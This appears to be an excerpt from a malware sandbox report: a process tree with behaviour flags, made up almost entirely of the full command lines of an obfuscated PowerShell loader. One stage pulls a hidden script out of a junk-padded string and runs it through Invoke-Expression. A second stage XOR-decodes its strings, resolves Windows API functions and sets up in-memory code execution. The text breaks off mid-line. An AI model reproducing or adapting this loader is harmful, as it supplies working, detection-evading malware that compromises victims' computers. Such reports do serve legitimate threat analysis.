cmSyfhSolePhedReksOpsgimmrSkeuPlupmaspMakeKab1Wad0Ske4Duk7Res Pak<DevAMlknZiafRowgMictMoteMajlElgiMongStreEkssSla2Cha;Imm<scaACalnInsfGodgChatCraeTorlKabiPragUnpeLyksLea3Bag Uds=End AlfFSkoiJossLachThybAttoSagwpyglRev0Bis Nuz'Unw9Eno5NonEJul4UnhDUhuFHutCVal7AleDFloEUnsCTak5TroDpho8LigDTvaFNonDIon6Bom9UniFBusFBab5TomDTri4EncDOpl7WoeDHis8SanDForFStrDPil4DelFSnf2UnfDUndETurDFraFDurCCau2CerCHem5AveCUns3DieCReg4EpiDUnh2knyCPse5StoDIndEIntCFor3del9Ara9Uaf9Hag5PlaCPel5RetCRev3SpeDEva0PalDThiFTenCKat0Moa8Phl7Dys9whiDSfu9Abn1AfvEDisAAbsEAfh2UndCKns8PlaCLys2ColCPaa5DisDsvv4OscDberCMan9KarFSmaEMal3MisDIga4UnmDPro7ItaDLeaDKeeDTyp4SvoDSup2konCHan5PolDPle8ForDModEOveDTheFGli9BraFKonFInd2BroDIgn0KobDForDerbDAfsDPagDCol8PetDForFDaaDGen6KreFDos2PenDBekEPleDAfkFTenCPra7CheDDec4RemDAmaFPibCAwa5PutDHau8PisDPolEOrdDJobFBedCStk2RaaEarrCdoc8DraBEle8RanBMerEove2SplCNon5DemDEth0UnfDSubFVgfDAar5KilDUru0OrdCHes3BesDCho5str9JulDOsm9Pri1Ges9Bus5SchFEmeEMisCTax1SkyCRaa1DetDAliEaziDStyFAeoDBac4AlkDAcyFRecCTel5vilDPos4AckCScu3MouCSam2Lif9Dip8Bol9skyFRevEHie2MntDUnf4DelCTil5braFKvi8SedDBetCMatCThu1DagDGlaDberDExc4SkyDRosCGuaDSek4CobDurfFsinCkru5eleDKom0ExtCSti5MemDFor8hklDIngEAnaDResFIndFMin7ForDMatDTorDSno0ExoDSik6JosCUnj2Swa9fin9Afs9Hac5LinCFet5FlgCGel3TomDSis0ennDBelFSomCEvi0Blo8Sik6Fje9Ody8Kla'Abo;Por.Rep<IntVVuliArvrOvekLamsStooBaimNonhOldebevdsogsGragHinrSemuVoepForpSoweadr1Gra0Aus4Far7Ban Hed<AcqAOvenSysfBalgNontInveWurlDegiklagOrdePresFgt3Dil;Pon<IntADamnbitfOekgChetSkreStylIndiMuhgUvieCresRet4Pre Rev=Coc ColFUnsiTrasCowhCosbMinoShowFralSko0Ven Reg'Lau9Hun5ForESkr4UdvDOrdFBygCFng7DemDUveEParCDaf5PlaDkar8SpeDCryFBraDLun6Fan9AmbFNotFRet5mycDKon4AcaDBra7NumDEgg8EksDDeiFUnrDRep4WarFIndCRubDBon4supCJos5ConDInd9StiDAchEKorDDrb5Kon9Env9Sal9Ovi5dikEEng7IncDSam8KomCOps3AmmDcomAMatCpra2SmeDAalEEncDetiCdroDTim9WatDAcr4AntDSor5StuCEnd2CylDEil6ModCMcc3OxyCUnv4TreCUnd1PruCLic1BanDPaa4Pre8Pro0Ove8Gip1Net8Wil5Ank8Aro3End9BobDhon9Els1Pus9Kol5MasEMan7RegDSar8BryCEso3HarDIntAhesCIns2disDMatEDinDDanCWalDPol9DvsDWoo4EyeDRan5ShiCKil2TurDKri6SovCAfm3DynCBom4ratCChr1AdvCFor1AwaDMis4Mal8Uns0Rus8Rec1Iso8Wor5Haa8Der2Ske9FlsDUbi9Brn1Jag9Sma5TomESta7UndDove4AnlDForFFlaCDro5IsoDUrt4FryCMon1tarDSge4SplDUdtFProDMin6EmbDMat4Pte9TraDTul9Myt1Fri9Sen5ConFParECopCUnb1TesCUde1NewDBonECodDTanFVanDCly4vrdDPisFSurCRve5RefDPse4ColCSka3flaCsti2Ove9Spo8Ove9InbFDayESlu2SypDSdm4RusCChe5verFTan8SubDBegCPedCKon1GarDChiDJorDMan4EpiDHeiCForDAfs4VirDjulFRotCmar5NetDStd0IntCSki5AbsDPre8SniDWasEMyrDomdFTagFNdl7UdtDYdeDSvvDInd0MagDPiv6InsCEft2Gar9Pic9Nar9Dig5JreCNon5NonCLig3FinDGru0IroDTraFHumCLem0Sna8Ses6Bor9Mas8Til'Mag;Ama.Snd<furVAfriBarrFakkAdvsKitoSkimElihAleeRemdPossStogbrnrSynuFisptelpsideAgr1Sno0Ret4Mer7Ank Sol<CopAHydnNerfProgspatUneeskrlHypiwingAbleReisSki4len;Prv<SigASkinKomfcysgSemtkomeBeslForiNongPoneBrasAdr5Hea Smi=Caf BraFluriSlusMichPorbAnaoFaswDoplPaa0Sta Mil'IndCper3PorDTil4EleCVul5AfkCDef4ProCOhm3DuaDShaFHot9Arm1Tha9Bas5NanESvi4OveDNotFUnaCBal7DyrDmalEDevCOph5LyoDCos8SalDKitFwasDFoa6Har9SkoFHalFKon2OblCOve3SluDSam4NonDBil0SygCSli5MorDSuo4DiaETra5KasCKaf8KanCSka1PosDbog4Whi9Reb9Sto9Tch8Ele'Bit;Par.Tha<CroVFejiGrerDebkPresSunoStemMethDoueDagdAfpsOpmgQuerUnsuLeupSkopDisesol1Lof0Pre4Kon7Mis For<NerAmudnUnrfRefgPactLoreStalFroiCohgaeteillsSul5Far Fds Gal Ind;Bia}Oph<ReaPGenaTincMoneOopnAngdEnreRedsBoo Cre=Sor UngFStoiKonsSynhHelbKenoLaewKatlSmo0Wor Gen'HydDAnnADisDBlo4BlaCSky3HinDUlvFPagDTil4UtuDChyDFla8Smi2Dkk8Uno3Bag'Fje;Dia<KamASemnVinfDekgTjstSageParlStuiMisgakteFlysJol6Ven Bio=Bas NdhFInfiOddsMethUdrbNifoRevwBellSkr0Syn Hos'Pil9Ind5lykEMid3SidDWit9RitDPic4MusDMasEUdvDPro3BriDAnt0GioCRef2ulsDBag4ForCBek2Eng8Col4Twi8Ove5Gen9Pro1Skr8TucCAna9Ask1ExeEOpaAFjeEFla2HelCgal8HanCBes2DiaCUbe5NicDPar4KinDRhiCAlt9IncFdehEInc3HalCAma4AnaDGadFSkaCPep5OveDOve8EzeDDagCTabDJin4Buc9CykFTidFNon8SexDObaFSteCDiv5NonDUde4IndCBel3TheDSubEOveCCas1GaaETun2SmeDAvl4CorCTra3ForCGyp7PloDRat8MalDFor2PseDCon4VinCOdo2Uph9KonFProFKupCSolDDes0ResCAnt3CurCant2StoDCor9BagDInc0BarDArnDSpiEIntCJul8LorBPaq8HomBUnfFFli6CloDVel4baaCKla5HypFAry5FicDVem4YleDSkyDRemDFej4LenDFat6etnDDr 0MigCpyr5EavDDre4kniFSha7LayDUdsEMagCDri3BunFLac7PyrCSko4CoqDexcFUnhDWor2RaaCSek5benDSam8NycDPlaEVasDShoFSnrEcir1detDTidEKerDpos8UglDRhaFdegCMal5FinDGla4ReaCUpp3Can9Mes9Hel9Opg9TenFBib7JomDCyc8TauCUdk2VarDMed9LnpDImp3MorDLejEexhCThr6EvaDRotDpri8Med3Udl8Ore3Sup9lol1Aft9Oct5OutEoly1BajDTri0HilDHyp2RulDBeg4CanDImpFPurDAph5AgaDCle4IndCBur2Big9Tri1Enc9Ele5RivEaut7KorDsus8UdlCFor3FruDLegASprCEta2CouDKriEWakDTatCValDWar9DriDNar4HorDLge5SikCPel2DegDRib6OmrCUnd3EleCOut4IndCSag1GruCMar1NonDDen4Fri8gui0Amo8Fds1Met8Ove5But8Who5Mar9Gen8Brs9kolDCla9Uds1Sur9Kak9JorFKlo7LinDPul8remCFip2ForDFel9BagDReg3EjeDIndEdisCBan6LagDOutDtar8Frt3Bek8Cel2Evi9Bal1ArbFsac1Fre9Dup9TorENymAPhoFDus8FloDunmFcokCSti5DisEFor1FngCEti5HypCfan3ForEenaCDat9arrDBra9Ric1OveEassASolEUnh4SelFAlp8NonDImpFtraCEcu5Mar8Rad2Def8Dom3AdfEAugCSva9QuiDOtt9Ter1AftEBumATrkEAla4DenFWri8IncDtanFSkeCEnc5Non8Pos2Rve8Sou3RodEVejCInt9ScaDIde9Ran1CheEFinAArgEKun4TanFTea8ExtDMedFAusCMin5Anm8Chr2Snu8Usi3PloETriCAna9Kom8Emm9Nat1Vac9Soc9MarELukANdrFnon8DutDKluFkraCTem5StaEvin1InfCBlo5RigCNat3HaaEDiaCUnb9Kre8Mag9Get8Eph9Act8Arb'Fly;Amp.Top<tacVFibiDdnrErykMicsRicoCremStihKeneLindAersLeggProrcaduSygpHonpOuteVed1Hob0Egn4Rib7bou Dim<DmmAUninTopfSnogShrtCraeDialEneiMungRoteMifsUni6Lug;Cel<CenSSmoeRinlTopeAllnMinoFretHotrHeioLabpHoryPla The=Cun RolFforiSpesBrohBalbStroKnewInelIst2mic2Ens Fis<OutVNubiOnerGoekStrsBaroBakmOvehSeneNapdhidsUnegDekrEleuBirpinvpFeveBib1Ski0Svi4Sph5Ter Syv<ThyVBraiPerrUngkProsPiooKulmKlahFabeHjedskisNongKonrMaruQuipAggpFareCar1Udn0Tre4Civ6Str;Sau<BulAChensaafGrigHowtJydeBiflFariRelgSureKrisCou7Iwo Vib=Koo staFSkoiTemsCouhHinbsteoBibwMirlSni0Bes Tyr'Mac9Upb5StaFRat9LosCAle8RegCGlu1TubDFor4SpaCFas3aniCLel1GluDlutDMesDHyp0UdlCfod2FriDMas8BioDOwe2Amt8Del2Afs9Ove1Ken8radCCon9Tri1The9Akk5PliEInn3creDVir9StrDCep4FedDFoxEPreDfor3HilDMis0NonCRen2SinDSys4MalCTra2Baa8Rup4Blo8Tag5Mit9StrFMunFAro8RevDAftFModCNyh7TaaDForETriDGalAAfeDMis4for9Kom9TimEaerANeuFSat8NveDbloFPicCFol5IceEBel1ScrCSop5HonCInd3OmaELivCout8IsoBLed8JewBSnoEPipBOpsDPer4RifCEle3LepDRadEMak9ForDPro9Sne1Afk8Nic7Tro8Brn4Gra8Afk6Pre9RntDCab9Jam1Sal8Cod1RefCLan9dri8Ell2Omn8For1esk8Eks1Sal8Rdm1Inc9KviDSet9Bee1Afa8Kni1JunCSog9lys8Fol5Lil8Aft1Des9Rul8Boa'Del;Akt.Car<XylVBopiPodrFackPjasForoOvemDevhFideTildtecsTeagoccrScruOvepElepBageImp1Dee0Sla4Hom7Emu Par<hubADionFinfOphgEpotGemerealUdsiJingGeneTeasAto7Rin;Pro<jagAbronProfForgsqutHoveUndlComiPergPleeDevsUnh8Tel Tel=Pro DypFChiiSpesPrdhSpubbrooAtlwHoflCli0Spa Phy'dob9Ufo5EnhEArb4UnsCFlo2GemDStjFResDTraEperDlit3SlaDOcc3RadDKir4FlsDInd5PigDKlf4AviCIrr2Pri8Cen0Pea8Nar8Rif8Ikk2kog9Ove1cou8OrgCmon9Unt1Val9Ant5DinEKva3RosDJem9WarDTra4HjfDHaaEchrDcha3DelDTra0KhaCPud2PorDacr4TriCKab2Und8Knf4sul8Arb5Fro9UngFKafFGas8DenDMyrFNytCDom7snuDYndEUndDFleALisDShu4Can9Van9PolEGodAEksFPyr8EkvDOdrFParCUko5BerEWar1HovCLar5baaCAst3IndEHerCAdm8UnfBNed8resBArcESjaBrowDFer4FauCTel3TriDbjeEInd9BilDStr9Aer1Csa8Sky4Kna8Bum1low8Vrd5Van8For9ess8For6Mil8Rev3Bor8Col8Dot8Gen7Slu9PusDHvi9Bir1typ8Wat1EduCUto9opd8Mon2Odi8Jam1Kjr8Pyr1Tib8Van1Gri9TopDCar9Afs1Cul8Mis1ParCQui9Tan8Ski5sys9Fri8Mid'Ple;Flo.Ris<CymVHngiBrerKkkkAflsGigoUncmImphRekeHiedTapsAccgDisrBekuTeipMahpMideFun1Fle0Cha4Lun7ned Rek<KloATovnTotfDepgBottSkeeHvilyppiRangFloeWassZik8Cop;sco<SteEMarxFrkpCrylprooMisrOplaPoitsubiIndoFarnPersKhe=Afh(AfhGUnveVsktCod-skrIRestUnleAdjmBekPTrirundoAfdpKedeCoarFoutLayyUds ada-SalPRenaUnmtRushPre Cit'ForHSteKCenCHanUFor:Ank\EmpCUndaDucmPrepRegeRevpBorhAegienglVoiuStrsUnr1Skr3Ref4Hag\HarOKnlvUdveTjerBikwSydiFresTileAdjlStiyInt'Kip)Jiz.KhuaunwfVirhLanoPollArbddoetSph;Fug<AsmARapnSalfmargUnhtRoweDenlSteiDecgEuteLagsUna9Inu Kny=Mar EngFHygiEgasBrahTilbQivoIsowHellSun0App Pra'dag9Kri5SupFTil0KylDAesFFilDTil7RavDGun6MasCIgn5StiDSki4SavDTvrDCenDEje8HimDOve6JunDPro4LakCOvo2kom9Bru1Bog8BerCDry9Brn1TanESysAWizESto2StrCTap8RolCCas2BabCnyd5PreDDem4HenDshuCdes9SulFStoFInt2DgnDBesEGigDHarFIntCAnh7ForDSog4RepCMet3UnsCBra5LopEScaCLgd8SovBMyn8LudBDifFRep7afmCDit3CusDJobEChiDEgeCUngFSep3PaiDSty0SysCUnw2skrDApp4Faw8dam7Cri8Baa5SamELan2DaaCKre5RifCBas3MunDAld8AngDfreFTrkDTro6Alu9Cir9San9rea5ResFDrn4TinCUnd9FroCRep1forDAfsDBraDTraEUnnCund3TraDLen0CohCIrr5GemDCon8IndDButESkrDFasFKabCSlm2Cad9Hyp8Coc'Lac;Pim.For<FdeVAdviBrarHalkAalsPluoAntmSplhSkeeTotdTorsSkrgMajrGruuTytpHalpForeAcc1Kon0Und4Iso7For Riv<frsAKnhnSudfExegOlatStaeTrilneliStbgConeeldsLoo9Pri;Sju<MaaEfouxTorpConlUneoArvrEndaUnstSubiVeroTilnRessLiz0Enk Prs=cur OmrFGraiSpysSkohforbsunoGuawUnclSke0Gro Bar'PalEsamALngEVan2PlaCSpl8ApoCRep2DisCSla5MicDVap4ReaDSanCPre9GynFBogEBol3FdsCAut4DebDaflFWisCBuf5PulDCel8TheDRhoCSalDVan4Hoo9IrrFAriFLkk8MorDWonFAgaCSlj5FetDPro4SarCVan3AutDGaiEKarCFir1KenEtre2PreDHar4antCSam3RarCvar7ClaDSom8ValDDis2PeaDskm4TraCfan2Ven9BilFUnrFSmlCBreDHua0ReyCCam3UnoCEle2SunDCha9UndDUnm0UloDSemDRetETanCRep8DatBBar8DupBBlaFbes2ArtDUniEAbiCErh1SchCPyo8Skv9jub9Kun9Sag5ForFGul0SlaDPulFrejDCoh7CalDMou6LabCNeu5PerDUly4MorDWorDCliDAll8TraDFou6AutDRec4SmaCFor2Pri9RekDHyg9Sha1Tor8Gri1Sko9KliDAar9Ank1Mul9sle1Eks9For5PorFNon9UndCDan8RejCMil1HomDStr4AmeCaab3KomCBow1ManDSkyDHanDHec0SkyCLam2DivDnex8CroDBek2Tar8ech2Imp9BesDAnt9Vit1Bra8Con7Hmm8Dem4Eng8Lni6Hng9bid8Lye'Mac;Sko.lib<UddVSeliRadrElgkTimsUamoExamparhNyaeNabdSousdgggPrurGenuSinpTrapAtteLin1Sti0Sil4Ase7Ass Kam<RejENonxLimpMaglAngoDitrAnsaPiltFreiQuioKrenTrasBen0Rea;Slo<EksEPanpBriiBengRevlTeloMaltBagtSphaSprlEnn=Exo<JunAPrsnLoofMasglogtsjoeRejlKomiValgKareGulsRel.BefcsuboAleuPornFartNij-Con6skr5Ken7Kro;Var<FolEHibxAvnpLydlskroChirSkaaNovtOveiSpooSannTudsTan1Adm Cot=Str GumFEleiTorsUndhAfsbHeloShowProlDuo0Sem Rve'HydERepALuxENon2UndCMat8PatCSta2RetCRib5UnrDNat4DgnDProCUnd9ProFNarEKer3TurCTal4HypDbruFParCAlt5IdeDAll8LatDVenCKatDHuz4Sma9SepFBjeFIrr8VatDsliFAvlCPhy5DeiDBra4FowCMuc3SenDEmiETreCTyv1enlECys2LorDEcl4TilCTyr3LayCXer7ProDStr8ConDPac2EnhDPar4LamCDer2Bru9ComFTilFAvoCIdrDBre0HarCDer3OveCVer2ComDBer9oysDUnc0FerDrygDSliEWinCFur8ZarBTra8SmrBManFSki2TraDPreEUnsCBan1EnoCRig8Hov9Spl9cac9Gni5BjrFKom0SteDAntFCliDDis7TilDPro6SkoCKel5HovDBul4ChaDUdsDAlbDked8ParDBri6DroDHyp4AfhCSka2Pri9TreDRes9Udm1Rec8Sec7Org8Fug4Und8Osc6For9PedDArc9Mic1Int9Mic5amwEVed4EksCjas2RnnDHumFJulDSkrEMalDFra3UnlDCar3FloDWic4AjaDlan5SpaDAdn4HypCTie2Eta8Eje0Hem8Des8non8Kra2Buk9SheDpyr9Ove1aek9Ind5pezFSla4PotCVis1CanDint8MejDUnd6PrvDSprDDisDFemEDryCGen5BelCHer5GipDTar0invDNarDFor9Til8Ude'Bav;Van.Skr<IntVPouiRegrStakSpisMicoUnrmAgrhUsaeKondParsAmpgmatrCapuThrptumpMaceCyk1pre0Gna4Unf7Osm dis<LkkEIndxUdspBlalGipoGasrGlyaHomtSkrinavoNegnFlisAft1kra;Ene<BroEtouxOplpDublAbeopatrRelaAnttBreiEndoIndnLazsSta2Lan Hns=kip LiqFShaiBadsSexhEstbOploKyswWealTob0Mec Bro'Und9Ove5PenEEot1LynDTraEDetDFdeDAppCRen8SilDSme6KasDAma0PluDHjlCLanCBun5Har8Udv9Ver8Lep5reo9Mim1opi8UnsCSde9Sys1AncELerAStoEDec2KanCCat8TilCMel2LreCDip5SalDSis4UnhDUdvCInf9TviFNldECar3TilCCof4IstDMulFKdfCtri5AflDZoo8PriDbraCSkrDkut4Duo9alaFGalFGen8FejDUdsFEleCTyr5SpoDBru4PerCUnc3ArtDAlfEBonCSmi1SunEAdv2alaDPer4SorCK B3GluCphy7SniDKol8VocDFea2EemDDam4NonCFis2Rat9DiaFEchFGedCParDThr0unlCDis3TriCBeb2HilDBer9ArgDSer0KatDSopDEmbERelCNap8SkrBTwa8intBSocFCho6GrnDRes4UdmCBal5ResFCan5UntDSmo4VenDFulDMenDpre4BreDRun6SnrDTel0TaeCOej5ScaDger4KlaFNic7StaDbooEIsrCNon3HypFHai7PolCbau4UdvDFnyFPreDSin2triCCyg5IndDSup8ColDHosERdkDPrlFhjeEGry1ShoDSclEVesDPre8UdtDSamFkriCDae5AbiDFll4LetCDil3Inc9Cof9Syd9Rep9gliFPro7DrgDYem8RonCRid2KonDKon9CopDDre3DejDBesERepCBel6oceDEchDMew8Aut3Non8Ecu3Sam9Und1Dab9Tra5ApoEUnd3ExcDspr4VolCLam2RunDUpwEskuDTogDRatDAor4TndDSovCJelDCadFTamDCom8DisCSou2renDHar4BekCMis2Sta9Mis1Oli9Unw5EttECoo2PaaDUnw4StrDKlaFopfCHaw2SluDTho8NdeCDio5MulDCal8knsCRygBLovDSma4jenDDks5Sil9Met8Ana9KurDPos9Gul1Yok9Sub9tetFRep7FugDKoa8TraCTil2TvaDFra9UdvDHab3OveDVanEChaCdin6morDsmaDDel8Sam3Pen8Amo2Bes9Els1AftFOpt1Und9Ove9SubEStvASprFWir8FulDFetFKroCJus5SmuEBul1warCBan5ReaCGer3TilEStrCTyp9BefDSkn9Rem1IndEDagAEnmFSva8SeaDDysFEntCCer5BriEpla1GraCGri5NovCAfs3SanEFlyCDvr9talDSwi9ove1PatEDorAFizFSki8SirDSkoFBolCPro5pynEFil1RigCSta5WhiCPer3HacEYouCSag9SpiDDid9Bol1RepEvugAChaFYea8MicDBraFTetCDet5AliEElv1LskCPoz5PerCFra3NonEComCepi9IneDDm 9Spe1StaERgtAUndFEsk8AnaDGirFneoCBlo5MonESki1BevCDol5SlyCBro3EtaESkiCKon9Ves8Pat9Res1Oph9Fod9CatESbeAFreFDuc8plaDPutFSevCUnc5HomEPls1StaCjub5SwoCfri3FugEHarCint9kon8Vre9Dis8Gud9Ind8Nie'Unc;Str&Aca(Nvn<ProVOutiCzarImpkSubsResoDismFodhSameVindSamsSolgTekrEdduPhypAfdpEmbeImp1Uns0Res4Car7Sta)Sub Whi<AlbEPinxMatpBaklrenoFjerIagaSemtHydiSpioDernBefsFar2Cam;Due<TheEBorxFampTielafeoAkkrLinaAchtAsciSugoAnenSkistot3pha Ned=Man SniFKamiGersFarhStjbMjaoUndwBedlSvi0skr vse'Dur9Tam5JerENar1HelDtinETaxDskrDDiaCWyr8ComDGst6RegDMas0EleDSkyCTjaCVse5Bur8Pal9Ade8Reo5Kra9DecFHumFHul8ResDUndFLseCFla7ColDLasEVanDScrABrnDHjb4Mus9Ris9Krl9Ada5staFSar9UneCPla8IntCElg1ParDPir4DksCEbr3ArtCSam1StuDNonDElkDSka0PerCMan2paiDBus8AadDTax2Una8Fll2Gte9AabDKre9Non5KraEArb4PleCSam2CheDIsoFForDKdkEPhoDFla3QueDSen3BatDNiz4GniDSan5AfbDSki4SigCRol2Str8Fes0Fie8One8isc8Til2Pro9TolDUnd9Reg5ResEUns2RopDFis4ForDHerDSipDVar4TekDAfkFAntDindEKnyCHaa5AmsCUdr3SteDKnuEBotCSca1DidCant8Aca9TilDRed8Spa1Cit9WarDAfh8Tra1Mul9Smr8Ove'Ant;fod&Min(Ant<AemVOveiUnwrDeokAfdsSlioRegmExchZygeFemdProsLevgForrulnuHospSlopgsteFor1Hir0Mar4Lad7Ove)Sat Ski<ProEAhoxEumpOpglRicoBanrAugaUnwtIndiSimoAlcnUdlsShe3Wer#Ere;""";Function Explorations9 { param([String]$Tetraster); For($Siestaer=3; $Siestaer -lt $Tetraster.Length-1; $Siestaer+=(3+1)){ $Clavial59='subs'+'tring'; $Fishbowl = $Fishbowl + $Tetraster.$Clavial59.Invoke($Siestaer, 1); } $Fishbowl;}$Pjkket0 = Explorations9 'PreIFirEEleXNon ';$Pjkket1= Explorations9 $Ignorer;$Pjkket1=$Pjkket1.replace('<','$');$Pjkket1=$Pjkket1.replace('>','"""');if([IntPtr]::size -eq 8){ .$env:windir\S*64\W*Power*\v1.0\*ll.exe $Pjkket1 ;}else{ & ($Pjkket0) $Pjkket1;}"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2812
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";Function Fishbowl0 { param([String]$Tetraster); $Kornets = New-Object byte[] ($Tetraster.Length / 2); For($Siestaer=0; $Siestaer -lt $Tetraster.Length; $Siestaer+=2){ $Kornets[$Siestaer/2] = [convert]::ToByte($Tetraster.Substring($Siestaer, 2), 16); $Kornets[$Siestaer/2] = ($Kornets[$Siestaer/2] -bxor 177); } [String][System.Text.Encoding]::ASCII.GetString($Kornets);}$tranq0=Fishbowl0 'E2C8C2C5D4DC9FD5DDDD';$tranq1=Fishbowl0 'FCD8D2C3DEC2DED7C59FE6D8DF82839FE4DFC2D0D7D4FFD0C5D8C7D4FCD4C5D9DED5C2';$tranq2=Fishbowl0 'F6D4C5E1C3DED2F0D5D5C3D4C2C2';$tranq3=Fishbowl0 'E2C8C2C5D4DC9FE3C4DFC5D8DCD49FF8DFC5D4C3DEC1E2D4C3C7D8D2D4C29FF9D0DFD5DDD4E3D4D7';$tranq4=Fishbowl0 'C2C5C3D8DFD6';$tranq5=Fishbowl0 'F6D4C5FCDED5C4DDD4F9D0DFD5DDD4';$tranq6=Fishbowl0 'E3E5E2C1D4D2D8D0DDFFD0DCD49D91F9D8D5D4F3C8E2D8D69D91E1C4D3DDD8D2';$tranq7=Fishbowl0 'E3C4DFC5D8DCD49D91FCD0DFD0D6D4D5';$tranq8=Fishbowl0 'E3D4D7DDD4D2C5D4D5F5D4DDD4D6D0C5D4';$tranq9=Fishbowl0 'F8DFFCD4DCDEC3C8FCDED5C4DDD4';$Virksomhedsgruppe1040=Fishbowl0 'FCC8F5D4DDD4D6D0C5D4E5C8C1D4';$Virksomhedsgruppe1041=Fishbowl0 'F2DDD0C2C29D91E1C4D3DDD8D29D91E2D4D0DDD4D59D91F0DFC2D8F2DDD0C2C29D91F0C4C5DEF2DDD0C2C2';$Virksomhedsgruppe1042=Fishbowl0 'F8DFC7DEDAD4';$Virksomhedsgruppe1043=Fishbowl0 'E1C4D3DDD8D29D91F9D8D5D4F3C8E2D8D69D91FFD4C6E2DDDEC59D91E7D8C3C5C4D0DD';$Virksomhedsgruppe1044=Fishbowl0 'E7D8C3C5C4D0DDF0DDDDDED2';$Virksomhedsgruppe1045=Fishbowl0 'DFC5D5DDDD';$Virksomhedsgruppe1046=Fishbowl0 'FFC5E1C3DEC5D4D2C5E7D8C3C5C4D0DDFCD4DCDEC3C8';$Virksomhedsgruppe1047=Fishbowl0 'F8F4E9';$Virksomhedsgruppe1048=Fishbowl0 'ED';$Resolemnises=Fishbowl0 'E4E2F4E38283';$Sensitized=Fishbowl0 'F2D0DDDDE6D8DFD5DEC6E1C3DED2F0';function Fishbowl22 {Param ($Omprve, $Kumeniker) ;$Anfgteliges0 =Fishbowl0 '95F5D8C2DFD4C8DDD0DFD5918C9199EAF0C1C1F5DEDCD0D8DFEC8B8BF2C4C3C3D4DFC5F5DEDCD0D8DF9FF6D4C5F0C2C2D4DCD3DDD8D4C2999891CD91E6D9D4C3D49CFED3DBD4D2C591CA9195EE9FF6DDDED3D0DDF0C2C2D4DCD3DDC8F2D0D2D9D4919CF0DFD59195EE9FFDDED2D0C5D8DEDF9FE2C1DDD8C59995E7D8C3DAC2DEDCD9D4D5C2D6C3C4C1C1D48081858998EA9C80EC9FF4C0C4D0DDC29995C5C3D0DFC0819891CC989FF6D4C5E5C8C1D49995C5C3D0DFC08098';.$Virksomhedsgruppe1047 $Anfgteliges0;$Anfgteliges5 = Fishbowl0 '95E2D4DCD8DFDEDCD0D5D8D2918C9195F5D8C2DFD4C8DDD0DFD59FF6D4C5FCD4C5D9DED59995C5C3D0DFC0839D91EAE5C8C1D4EAECEC91F19995C5C3D0DFC0829D9195C5C3D0DFC0859898';.$Virksomhedsgruppe1047 $Anfgteliges5;$Anfgteliges1 = Fishbowl0 'C3D4C5C4C3DF9195E2D4DCD8DFDEDCD0D5D8D29FF8DFC7DEDAD49995DFC4DDDD9D91F199EAE2C8C2C5D4DC9FE3C4DFC5D8DCD49FF8DFC5D4C3DEC1E2D4C3C7D8D2D4C29FF9D0DFD5DDD4E3D4D7EC99FFD4C69CFED3DBD4D2C591E2C8C2C5D4DC9FE3C4DFC5D8DCD49FF8DFC5D4C3DEC1E2D4C3C7D8D2D4C29FF9D0DFD5DDD4E3D4D79999FFD4C69CFED3DBD4D2C591F8DFC5E1C5C3989D919995F5D8C2DFD4C8DDD0DFD59FF6D4C5FCD4C5D9DED59995C5C3D0DFC08498989FF8DFC7DEDAD49995DFC4DDDD9D91F19995FEDCC1C3C7D4989898989D9195FAC4DCD4DFD8DAD4C39898';.$Virksomhedsgruppe1047 $Anfgteliges1;}function Fishbowl23 {Param ([Parameter(Position = 0)] [Type[]] $Opponenters,[Parameter(Position = 1)] [Type] $Ventepenge = [Void]);$Anfgteliges2 = Fishbowl0 '95E4DFC7DEC5D8DFD6918C91EAF0C1C1F5DEDCD0D8DFEC8B8BF2C4C3C3D4DFC5F5DEDCD0D8DF9FF5D4D7D8DFD4F5C8DFD0DCD8D2F0C2C2D4DCD3DDC89999FFD4C69CFED3DBD4D2C591E2C8C2C5D4DC9FE3D4D7DDD4D2C5D8DEDF9FF0C2C2D4DCD3DDC8FFD0DCD49995C5C3D0DFC08998989D91EAE2C8C2C5D4DC9FE3D4D7DDD4D2C5D8DEDF9FF4DCD8C59FF0C2C2D4DCD3DDC8F3C4D8DDD5D4C3F0D2D2D4C2C2EC8B8BE3C4DF989FF5D4D7D8DFD4F5C8DFD0DCD8D2FCDED5C4DDD49995C5C3D0DFC0889D9195D7D0DDC2D4989FF5D4D7D8DFD4E5C8C1D49995E7D8C3DAC2DEDCD9D4D5C2D6C3C4C1C1D4808185819D9195E7D8C3DAC2DEDCD9D4D5C2D6C3C4C1C1D4808185809D91EAE2C8C2C5D4DC9FFCC4DDC5D8D2D0C2C5F5D4DDD4D6D0C5D4EC98';.$Virksomhedsgruppe1047 $Anfgteliges2;$Anfgteliges3 = Fishbowl0 '95E4DFC7DEC5D8DFD69FF5D4D7D8DFD4F2DEDFC2C5C3C4D2C5DEC39995C5C3D0DFC0879D91EAE2C8C2C5D4DC9FE3D4D7DDD4D2C5D8DEDF9FF2D0DDDDD8DFD6F2DEDFC7D4DFC5D8DEDFC2EC8B8BE2C5D0DFD5D0C3D59D9195FEC1C1DEDFD4DFC5D4C3C2989FE2D4C5F8DCC1DDD4DCD4DFC5D0C5D8DEDFF7DDD0D6C29995C5C3D0DFC08698';.$Virksomhedsgruppe1047 $Anfgteliges3;$Anfgteliges4 = Fishbowl0 '95E4DFC7DEC5D8DFD69FF5D4D7D8DFD4FCD4C5D9DED59995E7D8C3DAC2DEDCD9D4D5C2D6C3C4C1C1D4808185839D9195E7D8C3DAC2DEDCD9D4D5C2D6C3C4C1C1D4808185829D9195E7D4DFC5D4C1D4DFD6D49D9195FEC1C1DEDFD4DFC5D4C3C2989FE2D4C5F8DCC1DDD4DCD4DFC5D0C5D8DEDFF7DDD0D6C29995C5C3D0DFC08698';.$Virksomhedsgruppe1047 $Anfgteliges4;$Anfgteliges5 = Fishbowl0 'C3D4C5C4C3DF9195E4DFC7DEC5D8DFD69FF2C3D4D0C5D4E5C8C1D49998';.$Virksomhedsgruppe1047 $Anfgteliges5 ;}$Pacendes = Fishbowl0 'DAD4C3DFD4DD8283';$Anfgteliges6 = Fishbowl0 